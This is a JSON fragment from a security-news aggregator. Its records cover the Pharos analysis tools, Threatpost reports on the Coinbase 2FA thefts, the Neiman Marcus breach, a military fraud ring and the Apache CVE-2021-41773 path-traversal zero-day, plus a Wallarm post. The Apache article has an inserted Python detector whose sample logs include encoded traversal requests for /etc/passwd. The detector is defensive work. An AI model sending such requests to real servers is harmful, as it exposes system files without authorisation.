The framework is designed to facilitate the automated [ analysis ](<https://www.kitploit.com/search/label/Analysis>) of binary programs. It uses the ROSE compiler infrastructure developed by Lawrence Livermore National Laboratory for disassembly, control flow analysis, instruction semantics, and more. \n\n \n\n\nThe current distribution is a substantial update to the previous version, and is part of an ongoing process to release more of the framework and tools publicly. This release has a more generous BSD [ license ](<https://github.com/cmu-sei/pharos/blob/master/LICENSE.md>) than the previous release. Carnegie Mellon University retains the [ copyright ](<https://github.com/cmu-sei/pharos/blob/master/COPYRIGHT.md>) . \n\n \n\n\nThe Pharos framework is a research project, and the code is undergoing active development. No warranties of fitness for any purpose are provided. While this release provides build instructions, unit tests, and some documentation, much work remains to be done. We've tested a few select build configurations, but have not actively tested the portability of the source code. See the [ installation instructions ](<https://github.com/cmu-sei/pharos/blob/master/INSTALL.md>) for more details. \n\n \n\n\n** Pharos Static Binary Analysis Tools **\n\n \n\n\n** APIAnalyzer **\n\nAPIAnalyzer is a tool for finding sequences of API calls with the specified data and control relationships. This capability is intended to be used to detect common operating system interaction paradigms like opening a file, writing to it, and then closing it. \n\n \n\n\n** OOAnalyzer **\n\nOOAnalyzer is a tool for the [ analysis ](<https://www.kitploit.com/search/label/Analysis>) and recovery of object oriented constructs. This tool was the subject of a paper titled \"Recovering C++ Objects From Binaries Using Inter-Procedural Data-Flow Analysis\" which was published at the ACM SIGPLAN Program Protection and Reverse Engineering Workshop in 2014. 
The tool identifies object members and methods by tracking object pointers between functions in the program. This tool was previously named \"Objdigger\" and is in the process of being renamed OOAnalyzer as part of a substantial redesign using Prolog rules to recover the object attributes. \n\n \n\n\n** CallAnalyzer **\n\nCallAnalyzer is a tool for [ reporting ](<https://www.kitploit.com/search/label/Reporting>) the static parameters to API calls in a binary program. It is largely a demonstration of our current calling convention, parameter analysis, and type detection capabilities, although it also provides a useful [ analysis ](<https://www.kitploit.com/search/label/Analysis>) of the code in a program. \n\n \n\n\n** FN2Yara **\n\nFN2Yara is a tool to generate YARA signatures for matching functions in an executable program. Programs that share significant numbers of functions are likely to have behavior in common. \n\n \n\n\n** FN2Hash **\n\nFN2Hash is a tool for generating a variety of hashes and other descriptive properties of functions in an executable program. Like FN2Yara it can be used to support binary similarity analysis, or provide features for [ machine learning ](<https://www.kitploit.com/search/label/Machine%20Learning>) algorithms. \n\n \n\n\n** DumpMASM **\n\nDumpMASM is a tool for dumping disassembly listings from an executable using the Pharos framework in the same style as the other tools. It has not been actively maintained, and you should consider using ROSE's standard recursive disassembler instead. 
\n\n \n \n\n\n** [ Download Pharos ](<https://github.com/cmu-sei/pharos>) **\n", "cvss3": {}, "published": "2018-08-26T17:06:59", "type": "kitploit", "title": "Pharos - Static Binary Analysis Framework", "bulletinFamily": "tools", "cvss2": {}, "cvelist": ["CVE-2021-41773"], "modified": "2018-08-26T17:06:59", "id": "KITPLOIT:9205213728263868656", "href": "http://www.kitploit.com/2017/09/pharos-static-binary-analysis-framework.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "threatpost": [{"lastseen": "2021-10-05T20:16:21", "description": "The accounts of at least 6,000 Coinbase customers were robbed of funds after attackers bypassed the cryptocurrency exchange\u2019s multi-factor authentication (MFA).\n\nAccording to a notification letter ([PDF](<https://s3.documentcloud.org/documents/21073975/09-24-2021-coinbase-customer-notification.pdf>)) \u2013 seen and posted by [BleepingComputer, ](<https://www.bleepingcomputer.com/news/security/hackers-rob-thousands-of-coinbase-customers-using-mfa-flaw/>)which first reported the story \u2013 that Coinbase sent to affected customers and filed with the California state Attorney General\u2019s office, the theft happened between March and May 20, 2021.\n\nThe attacker(s) used a flaw in Coinbase\u2019s account recovery process to seize the SMS two-factor authentication tokens needed to break into customers\u2019 accounts and transfer funds to crypto wallets unassociated with Coinbase.\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nIn order to pull it off, the culprits first needed access to victims\u2019 email addresses, passwords, phone numbers and personal email inboxes. 
Coinbase doesn\u2019t know exactly how the third parties gained access to all that, but the exchange doesn\u2019t think it\u2019s to blame: \u201cWe have not found any evidence that these third parties obtained this information from Coinbase itself,\u201d according to the exchange\u2019s breach notification.\n\nCoinbase noted that such information is often gleaned through phishing attacks or other social engineering techniques that trick victims into disclosing their login credentials.\n\n## Coinbase Phishing Attacks Are Rising\n\nIn fact, earlier this week, on Monday, Coinbase warned that [phishing attacks are on the rise](<https://blog.coinbase.com/phishing-attacks-are-on-the-rise-here-are-some-steps-you-can-take-to-protect-yourself-872833c7671b>), both in terms of volume and success rates. Between April and early May 2021, its security team saw a \u201csignificant uptick\u201d in Coinbase-branded phishing messages that targeted users of a range of commonly used email service providers: attacks that \u201cdemonstrated a higher degree of success\u201d at bypassing spam filters of certain older email services.\n\nCoinbase provided samples of the phishing attacks its team has seen, including the ones shown below:\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/10/01150844/locked-account-phishing-email-e1633115339529.png>)\n\n\u201cLocked account\u201d phishing email, designed to alarm the recipient into clicking without taking the time to verify other aspects of the message. \nSource: Coinbase.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/10/01151129/Hotmail-phish-e1633115503310.png>)\n\nFor some victims with Hotmail accounts, attackers attempted to add a malicious application to the user\u2019s inbox. If the recipient clicked \u201cYes,\u201d an attacker would be able to read all the user\u2019s emails (including password reset and device verification emails sent by Coinbase). 
Source: Coinbase.\n\nClearly, cryptocurrency thieves are nothing if not creative, and understandably so: They\u2019re going after a lucrative, juicy target. While they\u2019re considered a secure place for users to store their cryptocurrency assets, [researchers in 2018 proved](<https://threatpost.com/cryptocurrency-wallet-hacks-spark-dustup/140445/>) that wallets such as Ledger and Trezor are vulnerable to a number of cyber attacks.\n\nSubsequent events proved their point: In July 2020, an unauthorized third party [accessed Ledger\u2019s](<https://www.ledger.com/addressing-the-july-2020-e-commerce-and-marketing-data-breach>) e-commerce and marketing database, which held email addresses as well as contact and order details including first and last name, postal address, email address, and phone number.\n\nFollowing the July attack, researchers discovered [widespread campaigns](<https://threatpost.com/malicious-google-web-extensions-cryptowallet/154832/>) spreading malicious browser extensions that were abusing Google Ads and well-known cryptocurrency brands including Ledger to lure victims and eventually steal their cryptocurrency wallet credentials. 
Other wallets targeted in the campaign included Electrum, Exodus, Jaxx, KeepKey, MetaMask, MyEtherWallet and Trezor.\n\nAs well, the rise of cryptocurrency has made compromised crypto accounts hugely valuable in Dark Web marketplaces, according to the [2021 Dark Web price index](<https://threatpost.com/dark-web-markets-stolen-data/164626/>) from Privacy Affairs.\n\n\u201cDue to the skyrocketing prices of Bitcoin and other cryptocurrencies, hacked accounts may hold large sums of coin-based currency and cash, protected by relaxed security measures after the initial verification process,\u201d according to the report, which listed the average price for a hacked Coinbase-verified account to be $610.\n\n## SMS 2FA Authentication Flaw\n\nTL;DR: There are a lot of ways that the attackers could have gotten Coinbase users\u2019 personal details.\n\nBut beyond the personal information they needed to crack victims\u2019 accounts, the thieves needed more. For customers who use SMS texts for two-factor authentication (2FA), the unauthorized third parties had to leverage what Coinbase called a flaw in its SMS account recovery process, in order to receive an SMS 2FA token so as to gain access to accounts.\n\nCoinbase didn\u2019t go into detail about the flaw: It only said that as soon as it learned about the issue, it \u201cupdated our SMS Account Recovery protocols to prevent any further bypassing of that authentication process.\u201d\n\nIn a [guide on securing accounts](<https://help.coinbase.com/en/coinbase/privacy-and-security/data-privacy/how-can-i-make-my-account-more-secure>), Coinbase recommends enabling MFA authentication using security keys or Time-based One Time Passwords (TOTP) with an authenticator app. 
Verification via SMS text messages is listed as an option, but with caveats: This verification is, after all, subject to [SIM-swap](<https://threatpost.com/mobile-customer-service-sim-swap-fraud/151993/>) or phone-port attacks.\n\nSIM swapping is a form of fraud that allows crooks to bypass SMS-based 2FA and crack online banking or other high-value accounts such as cryptocurrency wallets. In a typical scenario, an attacker would start by phishing personal and banking information \u2013 often via SMS phishing, which has the added benefit of confirming that a victim\u2019s cell phone number is an active line. Next, an attacker calls the victim\u2019s mobile carrier \u2013 easily discovered with an online search \u2013 and convinces a service rep to port the line to a different SIM card/device.\n\n## Can We Please Just Ditch SMS-Based 2FA?\n\nExperts agree that we should stick a fork in SMS-based 2FA: It\u2019s clearly toast.\n\nRoger Grimes, author of \u201cHacking Multifactor Authentication\u201d and data-driven defense evangelist for [KnowBe4](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUavSzE-2FiwjSkZ-2BMZMLjTD68bBzltWsjOj4iPYBhQEjDkyRzZ_q07lK5GAAVvAnbc-2Fr-2FBDhAPhoMvwzp-2Bdh4wgfTcF0AUhu01ZMXdKNJrsN0iCyDU7ehW0N22Ype9yCK1TM6XYzZcULka2hXrkxot-2FYcsNMOW-2Fi7ZSbc4BW4Y4w5w74Jad0kl33W4of4UEvii1-2FaSF1UuT-2BEz-2F3w-2Fa4quMRgT-2BQRwS2UzU-2B80mrmRcZ7BOu57U-2BlcUbUsgPP5Wrdcp27qpLYZxzLJ8Qwfb3N2eINqk-2B5ALA-2BX5H1WrmgjAUxrSn8W0e1Z6v5ZnIV13lpn-2B50Ro1gC3Tlq6dmLQeuWBPT6iCljuZaA0Ro4dPQB024lIgxWmvsVLHVUCHy-2BYHA-2BMTirRBLwlLSZQSccA4CzRdeZ-2Fb9M-3D>), said that this has got to be at least the third or fourth time that Coinbase customers have been compromised. While all MFA solutions can be hacked multiple ways, SMS-based MFA is \u201camong the most hackable MFA solutions,\u201d he said.\n\nIt isn\u2019t exactly breaking news. 
In 2017, the [NIST Digital Identity Guidelines](<https://www.nist.gov/itl/applied-cybersecurity/tig/projects/special-publication-800-63>) said that SMS-based MFA was very weak and shouldn\u2019t be used to protect valuable data and content, going so far as to reserve the right to remove it as an allowed MFA solution completely in the future.\n\nIn spite of that, \u201cSMS-based MFA is probably the most used MFA solution on the internet today,\u201d Grimes said. He blames vendors who force users to rely on SMS-based MFA because that\u2019s what the vendor uses.\n\n\u201cAlmost all the users that do use SMS-based MFA do not know how easily it is hacked,\u201d Grimes contended, which is an issue with all MFA solutions. \u201cUsers are not told how each type can still be hacked, abused and bypassed, sometimes easily so, and this leads to most users thinking they are being super secure because they are using MFA and far less hackable, when that is absolutely not the case.\u201d\n\nGrimes thinks that the MFA solution lies in making sure \u201cthat all stakeholders (e.g., management, buyers, implementers, sysadmins, users, etc.) understand what the potential weaknesses are for their particular type of MFA, and everyone is educated about possible attacks and how to avoid them.\u201d\n\nChris Clements, vice president of solutions architecture for Cerberus Sentinel, added that it\u2019s incumbent on cryptocurrency users to understand that they\u2019re constantly being targeted by cybercriminals attempting to rob them.\n\nAnd once those funds are gone, they\u2019re gone for good, Clements said. \u201cThe decentralized nature of most coins means that if criminals are successful in stealing them, there\u2019s very little chance you will be able to recover your losses,\u201d he said. 
\u201cAs such, it\u2019s important that users of cryptocurrency study up and implement appropriate opsec to protect themselves from the inevitable attacks, including ensuring that any computing devices or smartphones are hardened and up to date with the latest security patches and implementing strong unique passwords as well as multi-factor authentication controls such as TOTP or hardware security keys like FIDO. Finally, cold wallets kept completely offline are useful for limiting much easier online attack vectors.\u201d\n\n## Coinbase Makes Good on the Money\n\nCoinbase said that it will deposit funds back into victims\u2019 accounts, \u201cequal to the value of the currency improperly removed from your account at the time of the incident.\u201d Some customers have already been reimbursed, the exchange said, promising that customers will receive \u201cthe full value of what you lost.\u201d\n\nThe exchange is also providing free credit monitoring to affected customers.\n\nCoinbase encouraged users of SMS-based authentication to drop it and to instead use stronger MFA, including TOTP or a hardware security key. 
It also strongly encouraged victims to change their Coinbase account password to a new, strong and unique password: one that\u2019s not used on any other site.\n\nThe same goes for email accounts: \u201cBecause the third parties needed access to your personal email account as part of this incident, we strongly encourage you to change your password in the same way for your email account and for any other online accounts where you use a similar password,\u201d the exchange advised.\n\n_**Check out our free **_[_**upcoming live and on-demand webinar events**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {}, "published": "2021-10-01T20:08:23", "type": "threatpost", "title": "MFA Glitch Leads to 6K+ Coinbase Customers Getting Robbed", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-41773"], "modified": "2021-10-01T20:08:23", "id": "THREATPOST:8325094507099F4F089C61EF2997445C", "href": "https://threatpost.com/mfa-glitch-coinbase-customers-robbery/175290/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-10-05T20:07:15", "description": "Dallas-based Neiman Marcus Group is known worldwide as the go-to luxury retailer for the well-heeled. 
But their reputation for impeccable quality just took a big hit with revelations that the company was breached by an attacker back in May 2020.\n\nIt took 17 months for the retailer to notice.\n\nJust this week, Neiman Marcus [acknowledged the compromise](<https://www.neimanmarcusgroup.com/2021-09-30-Neiman-Marcus-Confirms-Unauthorized-Access-to-Customer-Online-Accounts>), which included personal customer information like names, contact information, payment card information (without CVV codes), gift card numbers (without PINs), usernames, passwords and even security questions associated with online Neiman Marcus accounts.\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nIn total, Neiman Marcus, which also controls the brands Bergdorf Goodman, Neiman Marcus Last Call and Horchow, said 3.1 million cards were affected. But more than 85 percent of those had already expired, the company said.\n\n\u201cNo active Neiman Marcus-branded credit cards were impacted,\u201d the company\u2019s statement said. \u201cAt this time, the Company has no evidence that Bergdorf Goodman or Horchow online customer accounts were affected.\u201d\n\nNeiman Marcus is working with law enforcement and cybersecurity company Mandiant to get more information about the [retailer\u2019s compromise](<https://threatpost.com/protect-account-takeover-cyberattacks/175090/>), the company said.\n\n\u201cAt Neiman Marcus Group, customers are our top priority,\u201d Geoffroy van Raemdonck, the company\u2019s CEO, said in the announcement of the breach. \u201cWe are working hard to support our customers and answer questions about their online accounts. 
We will continue to take actions to enhance our system security and safeguard information.\u201d\n\n## **Undetected NMG Breach \u2018Dangerous\u2019 for Customers **\n\nBut security experts say it\u2019s too late for Neiman Marcus to protect its customers and that the delay in detection of the unauthorized access makes the situation more dire.\n\n\u201cThe breach occurred before Neiman Marcus filed for bankruptcy in September 2020, which could have caused a delay in identification,\u201d said Quentin Rhoads, director of professional services at security firm CriticalStart. \u201cFrom a security perspective it is very dangerous for a company to go this long without detecting and responding to a breach. More damage could have been done that has yet [to be] discovered.\u201d\n\nHe said it\u2019s likely the attackers sold off the access to NMG\u2019s systems to someone else for later abuse.\n\n\u201cEven though most of the credit cards and gift cards stolen don\u2019t contain data like pins and CVVs, and are probably expired, the theft of usernames and passwords is concerning,\u201d Rhoads added. \u201cThis data more than likely would be sold to other attackers who can use this for crimes such as [identity] theft in conjunction with the other personal information stolen.\u201d\n\nHe also said it\u2019s going to be hard to find any firm evidence of the breach, since so much time has passed since the initial compromise.\n\n\u201cMore than likely, critical evidence is no longer present in their systems,\u201d Rhoads said. \u201cThey could easily be unable to identify the initial point of the breach, what other areas did the attackers get access to, what the attackers did outside of stealing data. 
All of these points are critical for an organization to understand to appropriately notify [affected] parties, identify pathways to prevent this in the future, and [to provide] critical evidence to law enforcement to further criminal investigations.\u201d\n\n## **Lack of Security at Many Orgs Is \u2018Staggering\u2019**\n\nChris Clements, VP of solutions architecture at Cerberus Sentinel, was blunter about Neiman Marcus\u2019 security blunder.\n\n\u201cThe lack of both prevention and detection capabilities at many organizations is simply staggering,\u201d Clements said. \u201cI try as much as possible to shy away from victim blaming, but in many circumstances, organizations have been grossly negligent in securing customer data.\u201d\n\nClements added that in many breaches, it\u2019s very easy for an attacker to get their hands on customer data.\n\n\u201cDespite the press releases that almost never fail to describe the attackers or attack methods as \u2018highly sophisticated,\u2019 the reality is that most breaches aren\u2019t some \u2018super cyber heist plot\u2019 out of a bad movie, but rather akin to some guy walking in the front door and wheeling out a file cabinet and no one is around to notice.\u201d\n\nJustin Fier, a director with Darktrace, said Neiman Marcus\u2019s [security team](<https://threatpost.com/protect-account-takeover-cyberattacks/175090/>) should assume the attacker has been lurking in its systems since May 2020. He added that it\u2019s the responsibility of Neiman Marcus to adopt a more modern security strategy.\n\n\u201cToday, the most cyber mature retailers are relying on artificial intelligence for everything from credit fraud to supply logistics and, of course, to continually monitor their risk across globally distributed networks and complex digital infrastructures,\u201d Fier said. 
\u201cAs retailers like Neiman Marcus adapt to a more virtual world and embrace innovations to support remote shopping (like its recently announced virtual sneaker showroom) we should expect attacks on the industry to increase. These innovations open more avenues for attackers to poke to access the private data of consumers. Businesses have a responsibility to ensure their consumers\u2019 personal data is protected with the best defensive technology available to them.\u201d\n\nFor now, Neiman Marcus is asking customers to reset their passwords and has set up a call center for those concerned about their information being compromised.\n\nNick Sanna, CEO of RiskLens, said retailers are under both ethical and regulatory obligations to protect customer data.\n\n\u201cThey have an obligation to keep this sensitive customer data safe and out of the hands of the wrong people, obligations that are both ethical and regulatory in nature,\u201d Sanna said. \u201cThe outcome of not doing this is exactly what Neiman Marcus Group is now facing.\u201d\n\n_**Check out our free **_[_**upcoming live and on-demand webinar events**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {}, "published": "2021-10-01T17:50:42", "type": "threatpost", "title": "3.1M Neiman Marcus Customer Card Details Breached", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-41773"], "modified": "2021-10-01T17:50:42", "id": "THREATPOST:49DCD8325E10F7898739335BD99AE94B", "href": "https://threatpost.com/neiman-marcus-customers-breach/175284/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-10-05T20:16:39", "description": "More than 3,300 U.S. 
military service members, military dependents and civilians employed by the Department of Defense were compromised as part of a transnational cybercrime ring created to defraud them out of $1.5 million in military benefits from the DoD and the Department of Veterans Affairs.\n\nA former civilian medical records technician and administrator with the U.S. Army was at the center of the scheme, according to court documents filed in the U.S. District Court for the Western District of Texas. Fredrick Brown, a Las Vegas resident, was sentenced to 12 and a half years in prison last week, after admitting that between July 2014 and September 2015, he stole personally identifiable information (PII) for thousands of people.\n\nIn his capacity as a records technician, Brown had access to a military electronic health records database. He admitted that he took screenshots to pilfer names, Social Security numbers, military ID numbers, dates of birth and contact information from the victims.\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nHe sent the information to a Philippines-based co-defendant, Robert Wayne Boling Jr., he said. Boling and associates then used the data to access DoD and benefits sites and steal millions of dollars, according to the court documents.\n\nAs part of its nefarious work, the ring particularly targeted disabled veterans, who were selected because they were eligible for more service-related benefits, court officials said.\n\n\u201cThe defendant brazenly preyed on and victimized U.S. servicemembers and veterans, many of whom were disabled and elderly,\u201d said U.S. Attorney Ashley C. Hoff for the Western District of Texas, in a [media statement](<https://www.justice.gov/opa/pr/former-army-contractor-receives-151-month-sentence-fraud-scheme-targeting-thousands-us>). 
\u201cAs part of our mission, we strive to protect these honorable men and women from fraud and abuse. If fraudsters target our servicemembers and veterans, we will seek to identify them and hold them accountable. This office will continue to zealously investigate and prosecute perpetrators of these schemes.\u201d\n\nIn addition to 151 months of prison time, Chief Judge Orlando Garcia ordered Brown to pay $2.3 million in restitution. He\u2019ll also be placed on supervised release for three years after he gets out.\n\n\u201cRather than honoring those servicemembers and veterans who sacrifice for them, the defendant and his co-conspirators targeted and stole from these brave men and women in a years-long fraud scheme,\u201d said Acting Assistant Attorney General Brian Boynton of the Justice Department\u2019s Civil Division. \u201cSuch conduct is an affront to the United States and will not be tolerated.\u201d\n\nThe efforts to bring the ring\u2019s participants to justice are ongoing: In July 2020, Garcia sentenced Brown co-defendant and accomplice Trorice Crawford to 46 months in federal prison, a fine of $103,700 and a three-year supervised release post-jail. Brown worked with Crawford to recruit money mules \u2014 individuals who would deposit the stolen funds into their bank accounts and then send the funds through international wire remittance services to the fraudsters in a money-laundering operation, according to the court.\n\nU.S. service members have been victims of PII exposure in the past. In May for example, a database filled with the medical records of nearly 200,000 U.S. 
military veterans was exposed online by a vendor working for the VA, and an analyst found that it might have been [exfiltrated by ransomware attackers](<https://threatpost.com/veterans-medical-records-ransomware/166025/>).\n\n_**Check out our free **_[_**upcoming live and on-demand webinar events**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {}, "published": "2021-10-04T15:22:32", "type": "threatpost", "title": "Transnational Fraud Ring Bilks U.S. Military Service Members Out of Millions", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-41773"], "modified": "2021-10-04T15:22:32", "id": "THREATPOST:5F0369916D5AFC90C3AF027AC4EC4A61", "href": "https://threatpost.com/transnational-fraud-military-members/175298/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-10-08T11:24:43", "description": "Apache Software has quickly issued a fix for a zero-day security bug in the Apache HTTP Server, which was first reported to the project last week. The vulnerability is under active exploitation in the wild, it said, and could allow attackers to access sensitive information.\n\nAccording to a [security advisory](<https://httpd.apache.org/security/vulnerabilities_24.html>) issued on Monday, the issue (CVE-2021-41773) could allow path traversal and subsequent file disclosure. 
Path traversal issues allow unauthorized people to access files on a web server, by tricking either the web server or the web application running on it into returning files that exist outside of the web root folder.\n\nThe vulnerability is rated Important, with a CVSS score of 5.1 out of 10.\n\nIn this case, the issue affects only version 2.4.49 of Apache\u2019s open-source web server, which offers cross-platform operability with all modern operating systems, including UNIX and Windows.\n\n\u201cA flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49,\u201d according to the advisory. \u201cAn attacker could use a path-traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by \u2018require all denied,\u2019 these requests can succeed.\u201d\n\nThe bug could also expose the source of interpreted files like CGI scripts, the advisory added, which may contain sensitive information that attackers can exploit for further attacks.\n\nResearchers such as the offensive team at Positive Technologies quickly created proof-of-concept exploits verifying the attack path, so expect more attack avenues to be available publicly soon:\n\nhttps://twitter.com/ptswarm/status/1445376079548624899\n\nTenable [noted that](<https://www.tenable.com/blog/cve-2021-41773-path-traversal-zero-day-in-apache-http-server-exploited>) a Shodan search on Tuesday turned up about 112,000 Apache HTTP Servers that are confirmed to be running the vulnerable version, including 43,000 or so in the U.S.\n\n\u201cHowever, other vulnerable web servers might be configured to not display version information,\u201d according to the firm\u2019s blog.\n\nUsers can protect themselves by upgrading to version 2.4.50. 
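Added example, written for this page and not code from Threatpost, Apache or any of the tools named above: the detection side of the path-traversal class the advisory describes, run over constructed Apache access-log lines. It percent-decodes each request path (twice, so a double-encoded dot is revealed as well as a single-encoded one), walks the decoded segments the way a normalizer would, and flags any request whose `..` segments climb above the document root. The sample lines, addresses and traversal encodings are made up for the example and are not a claim about the exact bytes used against 2.4.49; the function names are the example's own.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Apache "combined" log format. The addresses,
# timestamps and traversal encodings are made up for this example.
SAMPLE_LOG = """\
203.0.113.5 - - [05/Oct/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
203.0.113.6 - - [05/Oct/2021:10:00:02 +0000] "GET /cgi-bin/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1" 200 1523 "-" "curl/7.79.1"
203.0.113.7 - - [05/Oct/2021:10:00:03 +0000] "GET /icons/..%252f..%252fetc/hosts?x=1 HTTP/1.1" 403 199 "-" "python-requests/2.26.0"
203.0.113.8 - - [05/Oct/2021:10:00:04 +0000] "GET /docs/../index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
"""

# Fields of the combined format up to the status code; the rest is ignored.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def decode_path(raw: str, rounds: int = 2) -> str:
    """Percent-decode a request path repeatedly (bounded) so that both
    single-encoded (%2e) and double-encoded (%252e) dots are revealed.
    The query string is dropped first; only the path maps to a file."""
    path = raw.split("?", 1)[0]
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def escapes_root(path: str) -> bool:
    """Walk the decoded path segment by segment the way a normalizer would.
    Each real segment descends one level and '..' climbs one; the moment
    the depth goes negative the path points outside the document root."""
    depth = 0
    for seg in path.split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg not in ("", "."):
            depth += 1
    return False


def find_traversal(log_text: str) -> list:
    """Return one record per request whose decoded path escapes the
    document root. A 200 on such a request is the case to investigate;
    a 403 is what 'require all denied' on the filesystem root produces."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        decoded = decode_path(m.group("target"))
        if escapes_root(decoded):
            hits.append({
                "ip": m.group("ip"),
                "raw": m.group("target"),
                "decoded": decoded,
                "status": int(m.group("status")),
                "served": m.group("status") == "200",
            })
    return hits


if __name__ == "__main__":
    for hit in find_traversal(SAMPLE_LOG):
        print(hit["ip"], hit["status"], hit["raw"], "->", hit["decoded"])
```

The fourth sample line is deliberately benign: `/docs/../index.html` contains `..` but never climbs above the root, so a detector that only greps for `../` would raise a false positive there, while one that decodes and then counts depth does not. Run against real logs, the records with `served` set are the ones worth a closer look.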
It should be noted that \u201crequire all denied\u201d (which denies access to all requests) is the default for protecting documents outside of the web root, [researchers have reported](<https://twitter.com/damian_89_/status/1445388530130227208>) \u2013 which mitigates the issue.\n\nApache credited Ash Daulton and the cPanel Security Team for reporting the bug.\n\n_**Check out our free **_[_**upcoming live and on-demand webinar events**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {}, "published": "2021-10-05T20:01:27", "type": "threatpost", "title": "Apache Web Server Zero-Day Actively Exploited, Exposes Sensitive Data", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-41773"], "modified": "2021-10-05T20:01:27", "id": "THREATPOST:641CEDBD77D5E4711F6E56353D7B5E33", "href": "https://threatpost.com/apache-web-server-zero-day-sensitive-data/175340/", "cvss": {"score": 0.0, "vector": "NONE"}}], "wallarmlab": [{"lastseen": "2021-12-07T18:39:22", "description": "Attacks against known vulnerabilities are one of the most common security risks. Have you seen an updated OWASP Top-10? A risk that used to be **A09 Using Components with Known Vulnerabilities** is now titled **A06:2021-Vulnerable and Outdated Components**. This category moved up to #06 from #9 in 2017. We highlighted this in our [OWASP Top 10 2021 proposal](<https://lab.wallarm.com/owasp-top-10-2021-proposal-based-on-a-statistical-data/>) that we published earlier this year.\n\nWe all know: _patch management is hard. _For many reasons: backward compatibility, code refactoring overheads, testing, legacy code. Patches and updates are just hard to apply on time. 
A kind of challenge where [WAFs](<https://www.wallarm.com/product/cloud-waf>) and [API Security Platform](<https://www.wallarm.com/product/cloud-native-api-security>) products can be a perfect solution with their attack detection capabilities, virtual patches, and proactive vulnerability detection capabilities.\n\n## Known attacks vs. unknown attacks\n\nWallarm introduces a new feature to highlight known attacks:\n\n 1. Attacks against known vulnerabilities and the CVEs associated with them.\n 2. Typical payloads and attack vectors that our team has already seen in the wild.\n\nBy using the new filters, you can filter out all the known attacks from your analysis, which drastically decreases the number of events to review. You can exclude events that are more likely to be mass scanning and random testing and instead focus on unique events and unusual attacks. It\u2019s also a great way to identify potential false positives, as it\u2019s highly unlikely that the output for the known attacks would contain any. Just use this attack query to exclude all the typical/known attacks and get only unusual events:\n\n * attacks today !known\n\nFor example, one of our customers had ~1K attacks for the last 7 days -- but only 12 events that were not relying on typical tooling/CVEs/scanning. A huge difference in the amount of data to analyze.\n\nAnother use case: suppose you learn about some new CVE that is relevant to your tech stack. You can instantly run a search query and check whether there have been any exploitation attempts against your applications.\n\nThe new feature is already deployed for the whole customer base. No updates or additional configuration are required. 
\n\n## See it in action\n\nThese are some examples of usage.\n\n**Chose between searching of all events, known or unknown attacks**\n\n * All attacks - see all the results\n * Known attacks (CVE) - attacks that are known to target CVEs or has typical payloads\n * Other attacks - not known attacks to keep 0days and potentially false positives\n\n\n**Search attacks by CVE **\n\nYou can search for the attacks that use some particular CVE:\n\n * attacks today known CVE-2021-41773\n\nOr if you like, find all the events that are related to any known CVE by using _known cve_ keywords:\n\n * attacks today known cve\nAttack details now includes CVE tags on the left side\n\n## New CVEs\n\nThe Wallarm team has added more than 1500 recent CVEs to the list and keeps updating the database every day. One of the objectives is that the team has to analyze all the new CVEs and introduce filters as soon as the public data on the CVE is published. Wallarm team also enumerates vulnerabilities backward by analysis of real attacks data to add filters for more known attacks and payloads seen in the wild.\n\nThe post [Wallarm starts to highlight CVE to address OWASP Top-10 A6 Vulnerable and Outdated Components](<https://lab.wallarm.com/wallarm-starts-to-highlight-cve-to-address-owasp-top-10-a6-vulnerable-and-outdated-components/>) appeared first on [Wallarm](<https://lab.wallarm.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-10-15T23:13:35", "type": "wallarmlab", "title": "Wallarm starts to highlight CVE to address OWASP Top-10 A6 Vulnerable and Outdated Components", "bulletinFamily": "blog", 
